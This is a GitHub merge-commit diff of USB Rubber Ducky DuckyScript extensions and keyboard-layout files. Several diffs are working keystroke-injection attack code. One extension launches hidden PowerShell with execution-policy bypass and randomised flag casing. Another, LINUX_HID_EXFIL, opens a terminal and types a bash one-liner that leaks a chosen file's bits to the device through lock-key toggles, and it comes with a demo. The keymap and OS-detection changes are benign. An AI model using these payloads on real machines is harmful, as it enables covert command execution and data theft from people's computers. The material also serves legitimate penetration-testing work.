Merge branch 'hak5:master' into master

pull/260/head
HackingMark 2023-03-15 10:06:46 +01:00 committed by GitHub
commit 3f6415327d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
55 changed files with 2201 additions and 376 deletions

View File

@ -99,6 +99,7 @@
"DOWNARROW":"00,00,51", "DOWNARROW":"00,00,51",
"UP":"00,00,52", "UP":"00,00,52",
"UPARROW":"00,00,52", "UPARROW":"00,00,52",
"NUMLOCK":"00,00,53",
"<":"00,00,64", "<":"00,00,64",
"APP":"00,00,65", "APP":"00,00,65",
"MENU":"00,00,65", "MENU":"00,00,65",

View File

@ -56,6 +56,7 @@
"ENTER":"00,00,28", "ENTER":"00,00,28",
"ESC":"00,00,29", "ESC":"00,00,29",
"ESCAPE":"00,00,29", "ESCAPE":"00,00,29",
"BACKSPACE":"00,00,2a",
"TAB":"00,00,2b", "TAB":"00,00,2b",
" ":"00,00,2c", " ":"00,00,2c",
"SPACE":"00,00,2c", "SPACE":"00,00,2c",
@ -102,10 +103,26 @@
"DOWNARROW":"00,00,51", "DOWNARROW":"00,00,51",
"UP":"00,00,52", "UP":"00,00,52",
"UPARROW":"00,00,52", "UPARROW":"00,00,52",
"NUMLOCK":"00,00,53",
"KPAD_SLASH":"00,00,54",
"KPAD_ASTERISK":"00,00,55",
"KPAD_MINUS":"00,00,56",
"KPAD_PLUS":"00,00,57",
"KPAD_ENTER":"00,00,58",
"KPAD_1":"00,00,59",
"KPAD_2":"00,00,5a",
"KPAD_3":"00,00,5b",
"KPAD_4":"00,00,5c",
"KPAD_5":"00,00,5d",
"KPAD_6":"00,00,5e",
"KPAD_7":"00,00,5f",
"KPAD_8":"00,00,60",
"KPAD_9":"00,00,61",
"KPAD_0":"00,00,62",
"KPAD_DOT":"00,00,63",
"\\":"00,00,64", "\\":"00,00,64",
"APP":"00,00,65", "APP":"00,00,65",
"MENU":"00,00,65", "MENU":"00,00,65",
"ALT-TAB":"00,00,71",
"CONTROL":"01,00,00", "CONTROL":"01,00,00",
"CTRL":"01,00,00", "CTRL":"01,00,00",
"SHIFT":"02,00,00", "SHIFT":"02,00,00",
@ -137,6 +154,7 @@
"Z":"02,00,1d", "Z":"02,00,1d",
"!":"02,00,1e", "!":"02,00,1e",
"\"":"02,00,1f", "\"":"02,00,1f",
"£":"02,00,20",
"$":"02,00,21", "$":"02,00,21",
"%":"02,00,22", "%":"02,00,22",
"^":"02,00,23", "^":"02,00,23",
@ -151,19 +169,26 @@
"~":"02,00,31", "~":"02,00,31",
":":"02,00,33", ":":"02,00,33",
"@":"02,00,34", "@":"02,00,34",
"¬":"02,00,35",
"<":"02,00,36", "<":"02,00,36",
">":"02,00,37", ">":"02,00,37",
"?":"02,00,38", "?":"02,00,38",
"|":"02,00,64", "|":"02,00,64",
"CTRL-SHIFT":"03,00,00", "CTRL-SHIFT":"03,00,00",
"ALT":"04,00,00", "ALT":"04,00,00",
"ALT-TAB":"04,00,2b",
"CTRL-ALT":"05,00,00", "CTRL-ALT":"05,00,00",
"ALT-SHIFT":"06,00,00", "ALT-SHIFT":"06,00,00",
"COMMAND":"08,00,00",
"GUI":"08,00,00", "GUI":"08,00,00",
"WINDOWS":"08,00,00", "WINDOWS":"08,00,00",
"COMMAND-OPTION":"12,00,00", "COMMAND":"08,00,00",
"COMMAND-CTRL-SHIFT":"12,00,00", "COMMAND-CTRL":"09,00,00",
"COMMAND-CTRL":"12,00,00", "COMMAND-CTRL-SHIFT":"0b,00,00",
"COMMAND-OPTION-SHIFT'":"12,00,00" "COMMAND-OPTION":"0c,00,00",
"COMMAND-OPTION-SHIFT'":"0e,00,00",
"ALTGR":"40,00,00",
"ALTGR-TAB":"40,00,2b",
"¦":"40,00,35",
"CTRL-ALTGR":"41,00,00",
"ALTGR-SHIFT":"42,00,00"
} }

View File

@ -51,7 +51,8 @@ EXTENSION Rolling_Powershell_Execution
STRING powershell.exe -noP -nOnI -windo H STRING powershell.exe -noP -nOnI -windo H
END_IF END_IF
IF_DEFINED #EXECUTIONPOLICY
IF_DEFINED_TRUE #EXECUTIONPOLICY
SPACE SPACE
IF (($RANDOM_PS % 2) == 0) THEN IF (($RANDOM_PS % 2) == 0) THEN
STRING -ep ByPasS STRING -ep ByPasS

View File

@ -1,23 +1,26 @@
EXTENSION DETECT_READY EXTENSION DETECT_READY
REM VERSION 1.0 REM VERSION 1.1
REM AUTHOR: Korben
REM USAGE: REM_BLOCK DOCUMENTATION
REM Extension runs inline (here) USAGE:
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic Extension runs inline (here)
REM boot delay Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
REM TARGETS: TARGETS:
REM Any system that reflects CAPSLOCK will detect minimum required delay Any system that reflects CAPSLOCK will detect minimum required delay
REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION: REM CONFIGURATION:
DEFINE RESPONSE_DELAY 25 DEFINE #RESPONSE_DELAY 25
DEFINE ITERATION_LIMIT 120 DEFINE #ITERATION_LIMIT 120
VAR $C = 0 VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT)) WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK CAPSLOCK
DELAY RESPONSE_DELAY DELAY #RESPONSE_DELAY
$C = ($C + 1) $C = ($C + 1)
END_WHILE END_WHILE
CAPSLOCK CAPSLOCK

View File

@ -1,18 +1,24 @@
EXTENSION EXFIL_AUTO_EOF_DETECT EXTENSION EXFIL_AUTO_EOF_DETECT
REM VERSION 1.0 REM VERSION 1.1
REM AUTHOR: Korben
REM USAGE: REM_BLOCK DOCUMENTATION
REM Call WAIT_FOR_EOF() after starting Keystroke Reflection / HID Exfil USAGE:
Call WAIT_FOR_EOF() after starting Keystroke Reflection / HID Exfil
REM TARGETS: TARGETS:
REM Any; intended for use on systems that dont reflect more than 2 lock keys Requires reflection of at least 2 lock keys.
Intended for use on systems that dont reflect more than 2 lock keys.
END_REM
REM CONFIGURATION
DEFINE #INACTIVTY_TARGET 10
FUNCTION WAIT_FOR_EOF() FUNCTION WAIT_FOR_EOF()
VAR $CURRENT_CAPSLOCK_STATE = $_CAPSLOCK_ON VAR $CURRENT_CAPSLOCK_STATE = $_CAPSLOCK_ON
VAR $CURRENT_NUMLOCK_STATE = $_NUMLOCK_ON VAR $CURRENT_NUMLOCK_STATE = $_NUMLOCK_ON
VAR $PROCESSING = TRUE VAR $PROCESSING = TRUE
VAR $INACTIVITY_COUNT = 0 VAR $INACTIVITY_COUNT = 0
DEFINE INACTIVTY_TARGET 10
WHILE ($PROCESSING) WHILE ($PROCESSING)
DELAY 20 DELAY 20
IF($CURRENT_CAPSLOCK_STATE != $_CAPSLOCK_ON) THEN IF($CURRENT_CAPSLOCK_STATE != $_CAPSLOCK_ON) THEN
@ -25,7 +31,7 @@ EXTENSION EXFIL_AUTO_EOF_DETECT
LED_R LED_R
ELSE ELSE
$INACTIVTY_COUNT = ($INACTIVTY_COUNT + 1) $INACTIVTY_COUNT = ($INACTIVTY_COUNT + 1)
IF ($INACTIVTY_COUNT >= INACTIVTY_TARGET) THEN IF ($INACTIVTY_COUNT >= #INACTIVTY_TARGET) THEN
$PROCESSING = FALSE $PROCESSING = FALSE
END_IF END_IF
LED_OFF LED_OFF

View File

@ -1,13 +1,17 @@
EXTENSION HELLO_OS EXTENSION HELLO_OS
REM VERSION 1.0 REM VERSION 1.1
REM AUTHOR: Korben
REM USAGE: REM_BLOCK DOCUMENTATION
REM For use with OS_DETECT Extension, call HELLO_OS() after DETECT_OS() USAGE:
REM prints the OS determination For use with OS_DETECT Extension, call HELLO_OS() after DETECT_OS()
prints the OS determination
END_REM
REM Additional Example: Defining custom $_OS enums REM Additional Example: Defining custom $_OS enums
DEFINE SOME_OTHER_OS 6 DEFINE #EXTRA_EXAMPLES FALSE
DEFINE ANOTHER_OS 7 DEFINE #SOME_OTHER_OS 6
DEFINE #ANOTHER_OS 7
FUNCTION HELLO_OS() FUNCTION HELLO_OS()
IF ($_OS == WINDOWS) THEN IF ($_OS == WINDOWS) THEN
@ -22,12 +26,14 @@ EXTENSION HELLO_OS
STRING Hello ChromeOS! STRING Hello ChromeOS!
ELSE IF ($_OS == ANDROID) THEN ELSE IF ($_OS == ANDROID) THEN
STRING Hello Android! STRING Hello Android!
ELSE IF($_OS == SOME_OTHER_OS) THEN IF_DEFINED_TRUE #EXTRA_EXAMPLES
ELSE IF($_OS == #SOME_OTHER_OS) THEN
REM Example Only REM Example Only
STRING HELLO Custom OS Type! STRING HELLO Custom OS Type!
ELSE IF($_OS == ANOTHER_OS) THEN ELSE IF($_OS == #ANOTHER_OS) THEN
REM Example Only REM Example Only
STRING HELLO Another Custom OS Type! STRING HELLO Another Custom OS Type!
END_IF_DEFINED
ELSE ELSE
STRING Hello World! STRING Hello World!
END_IF END_IF

View File

@ -1,44 +1,94 @@
EXTENSION LINUX_HID_EXFIL EXTENSION LINUX_HID_EXFIL
REM VERSION 1.0 REM VERSION 1.1
REM AUTHOR: Korben
REM REQUIRES EXFIL_AUTO_EOF_DETECT EXTENSION REM REQUIRES EXTENSION EXFIL_AUTO_EOF_DETECT
REM Helpers for Linux Keystroke Reflection data exfiltration REM_BLOCK DOCUMENTATION
REM This payload is a proof of concept for USB HID only Data Exfiltration Helpers for Linux Keystroke Reflection data exfiltration
This payload is a proof of concept for USB HID only Data Exfiltration
REM TARGET: TARGET:
REM Linux Host that supports opening terminal via CTRL ALT t, and xdotool Linux host that supports opening terminal via CTRL ALT t, and xdotool
REM USAGE: USAGE:
REM Uncomment the function call below to run this extension inline REQUIRES EXFIL_AUTO_EOF_DETECT EXTENSION
REM or call RUN_LINUX_EXFIL() anywhere in your payload after the extension Prepare data to exfil (in filename defined by TARGET_FILE below)
with a terminal window already open - call RUN_LINUX_EXFIL()
REM DEPLOYMENT: DEPLOYMENT:
REM Plug Ducky into host, wait for the LED to turn (and stay) solid Green. Plug Ducky into host, wait for the LED to turn (and stay) solid Green.
END_REM
REM CONFIGURATION: REM CONFIGURATION:
REM File on host machine to exfil using Keystroke Reflection attack REM File on host machine to exfil using Keystroke Reflection attack
DEFINE TARGET_FILE t.txt DEFINE #TARGET_FILE filename.txt
DEFINE TERMINAL_OPEN_DELAY 500
DEFINE READY_TO_TYPE_DELAY 250 DEFINE #SAVE_AND_RESTORE_LOCKS TRUE
DEFINE #ENABLE_EXFIL_LEDS TRUE
DEFINE #CLOSE_TERMINAL_AFTER_EXFIL TRUE
REM if TRUE will open terminal, prepare data in #TARGET_FILE, and RUN_LINUX_EXFIL()
DEFINE #RUN_SIMPLE_USAGE_DEMO FALSE
FUNCTION RUN_LINUX_EXFIL() FUNCTION RUN_LINUX_EXFIL()
IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS
LED_OFF LED_OFF
DELAY READY_TO_TYPE_DELAY
CTRL ALT t
DELAY TERMINAL_OPEN_DELAY
SAVE_HOST_KEYBOARD_LOCK_STATE
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE $_EXFIL_LEDS_ENABLED = TRUE
STRINGLN uname -a > TARGET_FILE END_IF_DEFINED
STRINGLN c="xdotool key --delay 4";o=" Caps_Lock";l=" Num_Lock";bs=$(xxd -b TARGET_FILE |cut -d " " -f2-7);for (( i=0;i<${#bs};i++ ));do b="${bs:$i:1}";if [[ "$b" == "0" ]];then c+=$o;fi;if [[ "$b" == "1" ]];then c+=$l;fi;done;eval "$c";exit
IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS
SAVE_HOST_KEYBOARD_LOCK_STATE
END_IF_DEFINED
$_EXFIL_MODE_ENABLED = TRUE
STRING_BASH
c="xdotool key --delay 4";
bs=$(xxd -b
#TARGET_FILE
|cut -d" " -f2-7);
for((i=0;i<${#bs};i++));do
b="${bs:$i:1}";
if [[ "$b" == "0" ]];then
c+=" Caps_Lock";
fi;
if [[ "$b" == "1" ]];then
c+=" Num_Lock";
fi;
done;
$c;
END_STRING
IF_DEFINED_TRUE #CLOSE_TERMINAL_AFTER_EXFIL
STRING exit;
END_IF_DEFINED
ENTER
REM Requires adding EXFIL_AUTO_EOF_DETECT EXTENSION above this one
WAIT_FOR_EOF() WAIT_FOR_EOF()
$_EXFIL_LEDS_ENABLED = FALSE
$_EXFIL_MODE_ENABLED = FALSE $_EXFIL_MODE_ENABLED = FALSE
IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS
$_EXFIL_LEDS_ENABLED = FALSE
END_IF_DEFINED
IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS
RESTORE_HOST_KEYBOARD_LOCK_STATE RESTORE_HOST_KEYBOARD_LOCK_STATE
END_IF_DEFINED
END_FUNCTION END_FUNCTION
REM Uncomment the function call below to run this extension inline (here) IF_DEFINED_TRUE #RUN_SIMPLE_USAGE_DEMO
REM or call RUN_WINDOWS_EXFIL() anywhere in your payload after the extension REM DO NOT MODIFY THIS DEMO - copy and move outside extension if using as template.
REM DEMO Boot Delay
REM RUN_LINUX_EXFIL() DELAY 3000
REM Open Terminal
CTRL ALT t
DELAY 500
REM Perpare some data in TARGET_FILE
STRINGLN uname -a>#TARGET_FILE
REM Exfil data to USB Rubber Ducky using Keystroke Reflection
RUN_LINUX_EXFIL()
END_IF_DEFINED
END_EXTENSION END_EXTENSION

View File

@ -1,202 +1,217 @@
EXTENSION OS_DETECTION EXTENSION OS_DETECTION
REM VERSION 1.0 REM VERSION 1.1
REM AUTHOR: Korben
REM USB Rubber Ducky Host OS Detection REM_BLOCK DOCUMENTATION
REM Generic OS detection at a high view is a moving target USB Rubber Ducky Host OS Detection
REM results may vary greatly depending Generic OS detection at a high view is a moving target
REM on a combination of many variables: results may vary greatly depending
REM - number of testing stages on a combination of many variables:
REM - specific devices and versions tested against - number of testing stages
REM - number of systems testing for (scope) - specific devices and versions tested against
REM - detection techniques (passive/invisible/active/hybrid) - number of systems testing for (scope)
REM - overall speed - detection techniques (passive/invisible/active/hybrid)
REM - overall accuracy - overall speed
- overall accuracy
REM TARGET: If all you require is windows vs <anything other os> detection, the
REM DEFAULT - Windows, Mac, Linux PASSIVE_WINDOWS_DETECT extension is recommended over this extension.
REM ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android
REM USAGE: TARGET:
REM Uncomment the function call below to run this extension inline (here) DEFAULT - Windows, Mac, Linux
REM or call DETECT_OS() anywhere in your payload after the extension ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android
REM Place this extension and the DETECT_OS() before
REM you would like to first reference $_OS to execute payload code conditionally USAGE:
Uncomment the function call below to run this extension inline (here)
or call DETECT_OS() anywhere in your payload after the extension
Place this extension and the DETECT_OS() before
you would like to first reference $_OS to execute payload code conditionally
FEEDBACK:
As mentioned above, this a moving target (especially for mac systems)
Please report any issues identifying specific operating systems.
Your feedback will greatly help solidify the robustness of this extension
DEBUGGING:
SET DEBUGGING_OUTPUT DEFINE to TRUE, deploy on a target with text editor open for debug output
END_REM
REM CONFIGURATION: REM CONFIGURATION:
DEFINE VERBOSE FALSE REM For Debugging:
DEFINE ADVANCED_DETECTION FALSE DEFINE #DEBUGGING_OUTPUT FALSE
DEFINE STARTUP_DELAY 1500 DEFINE #ADVANCED_DETECTION FALSE
DEFINE RESTART_WAIT 1000 REM Timing fine tuning:
DEFINE CONNECT_WAIT 1000 DEFINE #STARTUP_DELAY 1500
DEFINE OS_DETECT_MODE HID DEFINE #RESTART_WAIT 1000
DEFINE OS_DETECT_VID VID_05AC DEFINE #CONNECT_WAIT 1000
DEFINE OS_DETECT_PID PID_021E DEFINE #OS_DETECT_MODE HID
DEFINE WINDOWS_HOST_REQUEST_COUNT 2 DEFINE #OS_DETECT_VID VID_05AC
DEFINE HOST_RESPONSE_TIMEOUT 1000 DEFINE #OS_DETECT_PID PID_021E
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #HOST_RESPONSE_TIMEOUT 1000
FUNCTION DETECT_OS() FUNCTION DETECT_OS()
$_HOST_CONFIGURATION_REQUEST_COUNT = 0 $_HOST_CONFIGURATION_REQUEST_COUNT = 0
ATTACKMODE OS_DETECT_MODE OS_DETECT_VID OS_DETECT_PID ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
DELAY STARTUP_DELAY DELAY #STARTUP_DELAY
SAVE_HOST_KEYBOARD_LOCK_STATE SAVE_HOST_KEYBOARD_LOCK_STATE
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
IF ADVANCED_DETECTION THEN IF_DEFINED_TRUE #ADVANCED_DETECTION
STRING ADVANCED OS DETECT STRING ADVANCED OS DETECT
ELSE ELSE_DEFINED
STRING OS DETECT STRING OS DETECT
END_IF END_IF_DEFINED
ENTER ENTER
STRING test caps STRING test caps
END_IF END_IF_DEFINED
IF ($_CAPSLOCK_ON == FALSE) THEN IF ($_CAPSLOCK_ON == FALSE) THEN
LED_R LED_R
CAPSLOCK CAPSLOCK
DELAY HOST_RESPONSE_TIMEOUT DELAY #HOST_RESPONSE_TIMEOUT
END_IF END_IF
LED_OFF LED_OFF
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING test done STRING test done
END_IF END_IF_DEFINED
IF $_RECEIVED_HOST_LOCK_LED_REPLY THEN IF $_RECEIVED_HOST_LOCK_LED_REPLY THEN
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING received led response STRING received led response
END_IF END_IF_DEFINED
LED_G LED_G
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING prediction: Windows STRING prediction: Windows
END_IF END_IF_DEFINED
$_OS = WINDOWS $_OS = WINDOWS
ELSE ELSE
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING prediction: Linux STRING prediction: Linux
END_IF END_IF_DEFINED
$_OS = LINUX $_OS = LINUX
END_IF END_IF
ELSE ELSE
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING no led response STRING no led response
ENTER ENTER
STRING prediciton: MacOS STRING prediciton: MacOS
END_IF END_IF_DEFINED
$_OS = MACOS $_OS = MACOS
END_IF END_IF
IF ADVANCED_DETECTION THEN IF_DEFINED_TRUE #ADVANCED_DETECTION
IF ( $_OS == LINUX ) THEN IF ( $_OS == LINUX ) THEN
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING soft reconnect STRING soft reconnect
END_IF END_IF_DEFINED
ATTACKMODE OFF ATTACKMODE OFF
DELAY RESTART_WAIT DELAY #RESTART_WAIT
ATTACKMODE OS_DETECT_MODE OS_DETECT_VID OS_DETECT_PID ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
DELAY CONNECT_WAIT DELAY #CONNECT_WAIT
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING reconnected STRING reconnected
END_IF END_IF_DEFINED
IF ($_CAPSLOCK_ON == TRUE) THEN IF ($_CAPSLOCK_ON == TRUE) THEN
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING caps led on STRING caps led on
ENTER ENTER
STRING test numlock STRING test numlock
END_IF END_IF_DEFINED
NUMLOCK NUMLOCK
DELAY HOST_RESPONSE_TIMEOUT DELAY #HOST_RESPONSE_TIMEOUT
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING test done STRING test done
END_IF END_IF_DEFINED
IF ($_NUMLOCK_ON == FALSE) THEN IF ($_NUMLOCK_ON == FALSE) THEN
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING no numlock led STRING no numlock led
ENTER ENTER
STRING prediciton: ChromeOS STRING prediciton: ChromeOS
END_IF END_IF_DEFINED
$_OS = CHROMEOS $_OS = CHROMEOS
ELSE ELSE
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING numlock led on STRING numlock led on
ENTER ENTER
STRING testing scrolllock STRING testing scrolllock
END_IF END_IF_DEFINED
SCROLLLOCK SCROLLLOCK
DELAY HOST_RESPONSE_TIMEOUT DELAY #HOST_RESPONSE_TIMEOUT
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING test done STRING test done
END_IF END_IF_DEFINED
IF ($_SCROLLLOCK_ON == TRUE) THEN IF ($_SCROLLLOCK_ON == TRUE) THEN
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING scrolllock led on STRING scrolllock led on
ENTER ENTER
STRING prediciton: Android STRING prediciton: Android
END_IF END_IF_DEFINED
$_OS = ANDROID $_OS = ANDROID
ELSE ELSE
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING no scrolllock reply STRING no scrolllock reply
ENTER ENTER
STRING prediction: Linux STRING prediction: Linux
END_IF END_IF_DEFINED
$_OS = LINUX $_OS = LINUX
END_IF END_IF
END_IF END_IF
END_IF END_IF
ELSE IF ($_OS == MACOS) THEN ELSE IF ($_OS == MACOS) THEN
IF ($_CAPSLOCK_ON == TRUE) THEN IF ($_CAPSLOCK_ON == TRUE) THEN
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING caps led on STRING caps led on
ENTER ENTER
STRING prediction: iOS STRING prediction: iOS
END_IF END_IF_DEFINED
$_OS = IOS $_OS = IOS
ELSE ELSE
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING no caps reply STRING no caps reply
ENTER ENTER
STRING prediction: MacOS STRING prediction: MacOS
END_IF END_IF_DEFINED
$_OS = MACOS $_OS = MACOS
END_IF END_IF
ELSE IF ($_OS == WINDOWS) THEN ELSE IF ($_OS == WINDOWS) THEN
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING Confident Windows Prediction STRING Confident Windows Prediction
END_IF END_IF_DEFINED
$_OS = WINDOWS $_OS = WINDOWS
END_IF END_IF
END_IF END_IF_DEFINED
RESTORE_HOST_KEYBOARD_LOCK_STATE RESTORE_HOST_KEYBOARD_LOCK_STATE
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING OS_DETECT complete STRING OS_DETECT complete
ENTER ENTER
END_IF END_IF_DEFINED
END_FUNCTION END_FUNCTION
REM Uncomment the function call below to run this extension inline (here) REM Uncomment the function call below to run this extension inline (here)
REM or call DETECT_OS() anywhere in your payload after the extension REM or call DETECT_OS() anywhere in your payload after the extension
REM DETECT_OS() REM DETECT_OS()
END_EXTENSION END_EXTENSION

View File

@ -1,21 +1,24 @@
EXTENSION PASSIVE_DETECT_READY EXTENSION PASSIVE_DETECT_READY
REM VERSION 1.0 REM VERSION 1.1
REM AUTHOR: Korben
REM Passive Detect Ready - no injection dynamic boot delay REM_BLOCK DOCUMENTATION
REM for hosts that reflect current OS lock key state on connect Passive Detect Ready - no injection dynamic boot delay
for hosts that reflect current OS lock key state on connect
REM USAGE: USAGE:
REM Extension runs inline (here) Extension runs inline (here)
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic Place at beginning of payload (besides ATTACKMODE) to act as dynamic
REM boot delay boot delay
END_REM
REM CONFIGURATION: REM CONFIGURATION:
DEFINE MAX_WAIT 150 DEFINE #MAX_WAIT 150
DEFINE CHECK_INTERVAL 20 DEFINE #CHECK_INTERVAL 20
VAR $MAX_TRIES = MAX_WAIT VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY CHECK_INTERVAL DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1) $MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE END_WHILE
END_EXTENSION END_EXTENSION

View File

@ -1,37 +1,42 @@
EXTENSION PASSIVE_WINDOWS_DETECT EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.0 REM VERSION 1.1
REM AUTHOR: Korben
REM Windows fully passive OS Detection and passive Detect Ready REM_BLOCK DOCUMENTATION
REM Includes its own passive detect ready. Does not require Windows fully passive OS Detection and passive Detect Ready
REM additional extensions Includes its own passive detect ready.
Does not require additional extensions.
REM USAGE: USAGE:
REM Extension runs inline (here) Extension runs inline (here)
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic Place at beginning of payload (besides ATTACKMODE) to act as dynamic
REM boot delay boot delay
REM $_OS will be set to WINDOWS or NOT_WINDOWS $_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION: REM CONFIGURATION:
DEFINE MAX_WAIT 150 DEFINE #MAX_WAIT 150
DEFINE CHECK_INTERVAL 20 DEFINE #CHECK_INTERVAL 20
DEFINE WINDOWS_HOST_REQUEST_COUNT 2 DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE NOT_WINDOWS 7 DEFINE #NOT_WINDOWS 7
VAR $MAX_TRIES = MAX_WAIT $_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY CHECK_INTERVAL DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1) $MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS $_OS = WINDOWS
ELSE
$_OS = NOT_WINDOWS
END_IF END_IF
REM EXAMPLE USAGE AFTER EXTENSION REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
REM IF ($_OS == WINDOWS) THEN IF ($_OS == WINDOWS) THEN
REM STRING HELLO WINDOWS! STRING HELLO WINDOWS!
REM ELSE ELSE
REM STRING HELLO WORLD! STRING HELLO WORLD!
REM END_IF END_IF
END_REM
END_EXTENSION END_EXTENSION

View File

@ -1,38 +1,62 @@
EXTENSION PROTECTED_STORAGE_MODE EXTENSION PROTECTED_STORAGE_MODE
REM VERSION 1.0 REM VERSION 1.1
REM AUTHOR: Korben
REM Example hidden storage mode REM_BLOCK
REM Forces user to padlock style unlock storage mode by setting Example hidden storage mode
REM the HOSTs lock keys and pressing the duck button to submit a Forces user to padlock style unlock storage mode by setting
REM combination three times. the HOSTs lock keys and pressing the duck button to submit a
REM The wrong combination will immediately fail silently. combination three times.
REM The correct combination will trigger ATTACKMODE STORAGE and LED_G The wrong combination will immediately fail silently.
The correct combination will trigger ATTACKMODE STORAGE and LED_G
REM TARGET: TARGET:
REM Any host that will reflect CAPSLOCK,NUMLOCK, and SCROLLLOCK Any host that will reflect CAPSLOCK,NUMLOCK, and SCROLLLOCK
REM USAGE: USAGE:
REM BUTTON_DEF BUTTON_DEF
REM STORAGE_PASSWORD_CHECK() STORAGE_PASSWORD_CHECK()
REM END_BUTTON END_BUTTON
CONFIGURATION:
Available combinations provided as DEFINEs below,
change within the STORAGE_PASSWORD_CHECK as desired
Method of input submission can be changed using SUBMIT_FOR_CHECK
But will obviously convolute combination checks.
END_REM
REM Combinations provided as defines for convenience (verbosely spaced - DEFINES aren't re-formatted by preprocessor)
DEFINE #ALL_LOCKS_OFF ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == FALSE ) )
DEFINE #ALL_LOCKS_ON ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) )
DEFINE #ONLY_CAPS_ON ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == FALSE ) )
DEFINE #ONLY_NUM_ON ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) )
DEFINE #ONLY_SCROLL_ON ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == TRUE ) )
DEFINE #ONLY_CAPS_OFF ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == TRUE ) )
DEFINE #ONLY_NUM_OFF ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == TRUE ) )
